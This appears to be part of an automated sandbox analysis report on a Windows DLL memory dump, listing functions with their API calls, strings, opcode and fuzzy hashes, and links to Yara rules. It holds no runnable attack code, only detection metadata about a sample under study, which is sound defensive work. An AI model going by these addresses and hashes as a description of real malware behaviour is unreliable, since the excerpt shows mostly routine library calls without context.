0x6e7dfc7f
0x6e7dfc2b
0x6e7dfc87
0x00000000
0x6e7dfc87
0x6e7dfaff
0x6e7dfb05
0x6e7dfb10
0x6e7dfadb
0x6e7dfade
0x6e7dfaf5
0x6e7dfaf5
0x6e7dfac7
0x6e7dfacc
0x00000000
0x6e7dfacc
0x6e7dfac5
0x00000000

APIs

GetModuleFileNameW.KERNEL32(6E7D0000,?,00000104), ref: 6E7DFABD
GetModuleHandleW.KERNEL32(00000000), ref: 6E7DFB37

Strings

Module_Raw, xrefs: 6E7DFC0F
APPID, xrefs: 6E7DFA7D
Module, xrefs: 6E7DFBE2
REGISTRY, xrefs: 6E7DFC6D

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 19eca9856bbead052f9cf4a0844341a73366057c10bf330b6599ed4e06f11852
Instruction ID: 29d0bf45f8e0973f93a2d9d220fba51c6ea1f492e463a453fdbd79f1795b6714
Opcode Fuzzy Hash: 19eca9856bbead052f9cf4a0844341a73366057c10bf330b6599ed4e06f11852
Instruction Fuzzy Hash: E661D4359006298BDB28CF90CE64BEA7378FF45714F1445ADD80EA76A0EB745E88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE200, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E7DE28D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E7DE29F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E7DE2C6
LoadResource.KERNEL32(00000000,00000000), ref: 6E7DE2DE

Part of subcall function 6E7DD8A0: GetLastError.KERNEL32(80070057,8007000E,80004005), ref: 6E7DD8A0

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E7DE3CF

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 47397681dbf385e6248f21fd7a8c73de7d1113cd4896806526dcc1162343675f
Instruction ID: 98cc835cfb72f433e4ef573e577581eb0ff9907e408e82c86b3bac12efe366ee
Opcode Fuzzy Hash: 47397681dbf385e6248f21fd7a8c73de7d1113cd4896806526dcc1162343675f
Instruction Fuzzy Hash: 2D5105B1D0061DDFDB12CF94CE44B9EB7B8EB89314F5001A9F608A72A0D7309A49CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FF18F, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7FF921,?,?,?,?,?), ref: 6E7FF1D1
__fassign.LIBCMT ref: 6E7FF253
__fassign.LIBCMT ref: 6E7FF272
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E7FF29F
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E7FF921), ref: 6E7FF2BE
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E7FF921), ref: 6E7FF2F7

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0bb75076363499baba8fdeb675c6c08ec72aedb6997f7b2b022853a001becf42
Instruction ID: 3ff553f97f1b3949e3317657a4c44d0f12d2c908491951d700b65079fecc598e
Opcode Fuzzy Hash: 0bb75076363499baba8fdeb675c6c08ec72aedb6997f7b2b022853a001becf42
Instruction Fuzzy Hash: CC518D70A04649DFDB05CFE8C991AEEBBF8FF09310F20456AE555E7251EB309942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D57C0, Relevance: 10.6, APIs: 7, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 6E7D57C0: GetCurrentProcessorNumber.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5825
Part of subcall function 6E7D57C0: CoUninitialize.OLE32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5870
Part of subcall function 6E7D57C0: GetSystemDefaultLangID.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D58C2
Part of subcall function 6E7D57C0: SwitchToThread.KERNEL32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D590A
Part of subcall function 6E7D57C0: GdiFlush.GDI32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5938

GdiFlush.GDI32(?,0000004A,?,?,?,?,6E7D5BE6,0000005C,00000058), ref: 6E7D5945

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Flush$CurrentDefaultLangNumberProcessorSwitchSystemThreadUninitialize
String ID:
API String ID: 427165119-0
Opcode ID: 3a6034ff7c50092351d27208fb5b01785cbf0ec085541f63531820d0b7204995
Instruction ID: 2ead49a549f38a6460bd51ce81799c16a0cbe302722de03fbdeb922a3ebe9fee
Opcode Fuzzy Hash: 3a6034ff7c50092351d27208fb5b01785cbf0ec085541f63531820d0b7204995
Instruction Fuzzy Hash: 82418931C24A00CFD3069BB4A5562DDF3A8DF6B3A2F298B26D455B7071F73008D8CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E8A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E7E8A3B
___except_validate_context_record.LIBVCRUNTIME ref: 6E7E8A43
_ValidateLocalCookies.LIBCMT ref: 6E7E8AD1
__IsNonwritableInCurrentImage.LIBCMT ref: 6E7E8AFC
_ValidateLocalCookies.LIBCMT ref: 6E7E8B51

Strings

csm, xrefs: 6E7E8AE6

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e7a8dbda628a74c1351746150d8e891447de8f937491fed7466f6998b13775f0
Instruction ID: e3c2f7be165a903761e5479a0016596b580a9a5cfba3b1acdcd93059fd21fab6
Opcode Fuzzy Hash: e7a8dbda628a74c1351746150d8e891447de8f937491fed7466f6998b13775f0
Instruction Fuzzy Hash: 11419334A002099BDF11CFE8C944ADEBBB9BF45328F188565D815ABBB1D731EA05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7D40, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,77DCEE0D,?,00000000,?,00000000,8007000E), ref: 6E7E7DB3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E7E7DEA

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: e1378656dedadc59b4d8b156847baa8cf20b0fd4127b44ddceb7be296e517f5e
Instruction ID: b53fe588b696ce8a5ec7c0c91454dabc7c07e7849335a3a64e8d75d432967c1f
Opcode Fuzzy Hash: e1378656dedadc59b4d8b156847baa8cf20b0fd4127b44ddceb7be296e517f5e
Instruction Fuzzy Hash: 13314D72B00749ABD710CFE49D45FAB77ACEB45B10F10057DF909EA6D0D732A901CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E29B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E7E2A40
GetWindowLongW.USER32 ref: 6E7E2A54
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E7E2A6A
GetWindowLongW.USER32 ref: 6E7E2A83
SetWindowLongW.USER32(?,000000FC,?), ref: 6E7E2A92

Strings

$, xrefs: 6E7E29F4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 9539757965e2f4781115e588e1c4ee35a98e42c1eb120a7cae276ab1c3c07f0c
Instruction ID: c19f8259da6553ef33fc11b8bacebbdc8cd6a281da7166c6f69a6b0b147a6391
Opcode Fuzzy Hash: 9539757965e2f4781115e588e1c4ee35a98e42c1eb120a7cae276ab1c3c07f0c
Instruction Fuzzy Hash: 83413D71900609EFCB20CF99C944A9FBBF5FF48710F108A2DE95AA7660D771A954CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DDA70, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,77DCEE0D), ref: 6E7DDAC4
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E7DDADB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,77DCEE0D), ref: 6E7DDB10
RegCloseKey.ADVAPI32(00000000), ref: 6E7DDB23

Strings

RegOpenKeyTransactedW, xrefs: 6E7DDAD5
Advapi32.dll, xrefs: 6E7DDABF

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 6e601eee6e636f5ab4016e2a3277b210581ba8eab3ad45109e27d92c324f4c24
Instruction ID: f72e69653d027d18ea3582ecbad4f7ad23e24697bee42a986283331b8b3f109e
Opcode Fuzzy Hash: 6e601eee6e636f5ab4016e2a3277b210581ba8eab3ad45109e27d92c324f4c24
Instruction Fuzzy Hash: 23318F71A0420AEFDB00CF99CD44FAABBB9FB49314F108629E915A7380D734A904CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8220, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E7D8251
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D825F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E7D8274
SysFreeString.OLEAUT32(00000000), ref: 6E7D827F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E7D82A6
SysFreeString.OLEAUT32(00000000), ref: 6E7D82B3
SysFreeString.OLEAUT32 ref: 6E7D82E2

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 77d993a9c1c4a2bddb5ebf08cf99521ad1eb5ecb28fd4289f86e38c61a8a7ceb
Instruction ID: 0400949e517fe8e77f8db24650bf876fa29e2b80f19b96b9109d833f4633d291
Opcode Fuzzy Hash: 77d993a9c1c4a2bddb5ebf08cf99521ad1eb5ecb28fd4289f86e38c61a8a7ceb
Instruction Fuzzy Hash: 94112C31640A19BBEB109FA4CD4DFAE7B64EF43720F10025DFA19A61D0CB706D48CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD676, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6E7FD6E0
api-ms-, xrefs: 6E7FD6CC

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 616764b1c092c0ccc2c0084fc3ca71a8fe4dbd5907945b3b1c02e7c50119d620
Instruction ID: 5fe323985935568c9d8e8ff3152dd22cf13d0309dd3216cb92d0b9786181cac9
Opcode Fuzzy Hash: 616764b1c092c0ccc2c0084fc3ca71a8fe4dbd5907945b3b1c02e7c50119d620
Instruction Fuzzy Hash: 2421DB31D05615EBD7514EE98E44B4A7768EF027A4F110664EE1DAB3A4F730DD02CDE8

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2040, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D206D

Part of subcall function 6E7E8B67: RaiseException.KERNEL32(?,?,6E7E5B36,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E7E5B36,000000FF,6E81BC44,?,000000FF), ref: 6E7E8BC7

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D20B2
___std_exception_copy.LIBVCRUNTIME ref: 6E7D20DF

Strings

ios_base::eofbit set, xrefs: 6E7D2086
ios_base::badbit set, xrefs: 6E7D2077, 6E7D20A2, 6E7D20C3
ios_base::failbit set, xrefs: 6E7D1F85, 6E7D2081

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 99af35d83d20b1a5ed009af78eaf370bf4badf458730077beab09c378ed5953b
Instruction ID: ad6b194981bf05ec13bdefe26f979eaca9c96de10fd0ffc0c3ac6be26643dd5e
Opcode Fuzzy Hash: 99af35d83d20b1a5ed009af78eaf370bf4badf458730077beab09c378ed5953b
Instruction Fuzzy Hash: 2011D5B29043096FC710DEE8D901BD6B39CAF05310F448A2AFA64DB650E771A54DCB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E804586, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E8042CD: _free.LIBCMT ref: 6E8042F6

_free.LIBCMT ref: 6E8045D4

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E8045DF
_free.LIBCMT ref: 6E8045EA
_free.LIBCMT ref: 6E80463E
_free.LIBCMT ref: 6E804649
_free.LIBCMT ref: 6E804654
_free.LIBCMT ref: 6E80465F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 25335b2d4975d15fa70a517c5f57c2af9d7cb5eb9d389406e4d7712ece36a1f7
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: 32112E71694B04EBD620AFF4CC09FCFB79CAF64708F404E26A299A65A0DB65B506C650

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E0E40, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6E7E0EEE

Part of subcall function 6E7E2AE0: EnterCriticalSection.KERNEL32(6E81EAA4,?,?), ref: 6E7E2B2A
Part of subcall function 6E7E2AE0: GetClassInfoExW.USER32 ref: 6E7E2B5D
Part of subcall function 6E7E2AE0: GetClassInfoExW.USER32 ref: 6E7E2B74
Part of subcall function 6E7E2AE0: LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2B83

Part of subcall function 6E7E7BC5: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E7E2972), ref: 6E7E7BCA
Part of subcall function 6E7E7BC5: HeapAlloc.KERNEL32(00000000), ref: 6E7E7BD1

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,6E809440,000000FF), ref: 6E7E0F39
GetCurrentThreadId.KERNEL32 ref: 6E7E0FDE
EnterCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E0FEC
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E1005
CreateWindowExW.USER32 ref: 6E7E103B

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: 4f0d7f07a734163022b5880773f83e26399710d18a6998709283eb7379623d6d
Instruction ID: dedd30c7a8a7a88f6d031657a6acec612305cf42f4d8fadb73b12cdd5313ed93
Opcode Fuzzy Hash: 4f0d7f07a734163022b5880773f83e26399710d18a6998709283eb7379623d6d
Instruction Fuzzy Hash: 10615B71A00606AFDB14CFA8D945BAEBBB9EF48710F14856DF815AB750EB30A950CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA892, Relevance: 9.2, APIs: 6, Instructions: 165COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E7EA943
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7EA953

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 8819d7aaabea4ffc9a6a192d4c9f315576edf2b67da9dfcaa9c70fc9dc64df34
Instruction ID: 18cb7113cc401a26a584ebfa8f265fa546eba6e6236d9d04b06fc202a379b2b2
Opcode Fuzzy Hash: 8819d7aaabea4ffc9a6a192d4c9f315576edf2b67da9dfcaa9c70fc9dc64df34
Instruction Fuzzy Hash: B0418C325086465FDB828EF88B945DA7BBDAF133687160D79E054E7DB1E720C5138F60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE4E0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,77DCEE0D,00000000,00000000), ref: 6E7DE51E
CharNextW.USER32(00000000,?,?,00000000), ref: 6E7DE54B
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE564
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE56F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E7DE5DE

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b41fea870acaabfd094358d249199264bda5ca2f7672bf87c6d458966749cbaf
Instruction ID: 5c4b25b256edca39e8140f8821c54bc2256276f09a05901a41417b7dc38ca68e
Opcode Fuzzy Hash: b41fea870acaabfd094358d249199264bda5ca2f7672bf87c6d458966749cbaf
Instruction Fuzzy Hash: AA411835E1011ACFCB02DFA9C980669F7F2EF89310B6445BAD84AD7368F7319945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D42B0, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D42F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D431B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D433B
__Getctype.LIBCPMT ref: 6E7D43D7
std::_Facet_Register.LIBCPMT ref: 6E7D43F6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4416

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 03c80ca707cc51db8f8e7672f8662ede4ee713530de7ec6aff92d532048ad5f3
Instruction ID: 5b3f4eb9de7d6e00bc5192a1a25594c306ccc80602836b73d9869bb40c12f583
Opcode Fuzzy Hash: 03c80ca707cc51db8f8e7672f8662ede4ee713530de7ec6aff92d532048ad5f3
Instruction Fuzzy Hash: 6851F371D046098FDB11CFD8D640ADEB7F8EF05714F248569D809AB761EB30A94ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DDB60, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E7DDA70: GetModuleHandleW.KERNEL32(Advapi32.dll,77DCEE0D), ref: 6E7DDAC4
Part of subcall function 6E7DDA70: RegCloseKey.ADVAPI32(00000000), ref: 6E7DDB23

RegCloseKey.ADVAPI32(?,?,?), ref: 6E7DDBC2
RegEnumKeyExW.ADVAPI32 ref: 6E7DDC0A
RegEnumKeyExW.ADVAPI32 ref: 6E7DDC43
RegCloseKey.ADVAPI32(?), ref: 6E7DDC58
RegCloseKey.ADVAPI32(?), ref: 6E7DDC80
RegCloseKey.ADVAPI32(?), ref: 6E7DDCA8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 941917c93c2ddc015de69f7579e78ac7edda261e74f22d917cf6ceefa9250e85
Instruction ID: 7f34259e6356cc03ce0d509880e94591e02d46d7b3d40953b5dca0ae04ef6a31
Opcode Fuzzy Hash: 941917c93c2ddc015de69f7579e78ac7edda261e74f22d917cf6ceefa9250e85
Instruction Fuzzy Hash: B9416F71204305AFD710DFA5D858BABB7E8EB88354F004A2DF999D7290DB70D909CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA971, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E7E898F,6E7E4560,6E7E4BF1,?,6E7E4E0E,?,00000001,?,?,00000001,?,6E81BB40,0000000C,6E7E4F02), ref: 6E7EA97F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E7EA98D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7EA9A6
SetLastError.KERNEL32(00000000,6E7E4E0E,?,00000001,?,?,00000001,?,6E81BB40,0000000C,6E7E4F02,?,00000001,?), ref: 6E7EA9F8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9157e92d3bf36ae87317946d87439ddb4f2158202dc83a7b20e1bf92a04a1d53
Instruction ID: 4f9d8473058d6266a81149ae56d4bbbec13839c422b09351a9c21a05529c919a
Opcode Fuzzy Hash: 9157e92d3bf36ae87317946d87439ddb4f2158202dc83a7b20e1bf92a04a1d53
Instruction Fuzzy Hash: 4301F13311CB135EAA515EF49E8D6962BA9EB027397210B3EF02C94DF4EF11484096C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E5D58, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

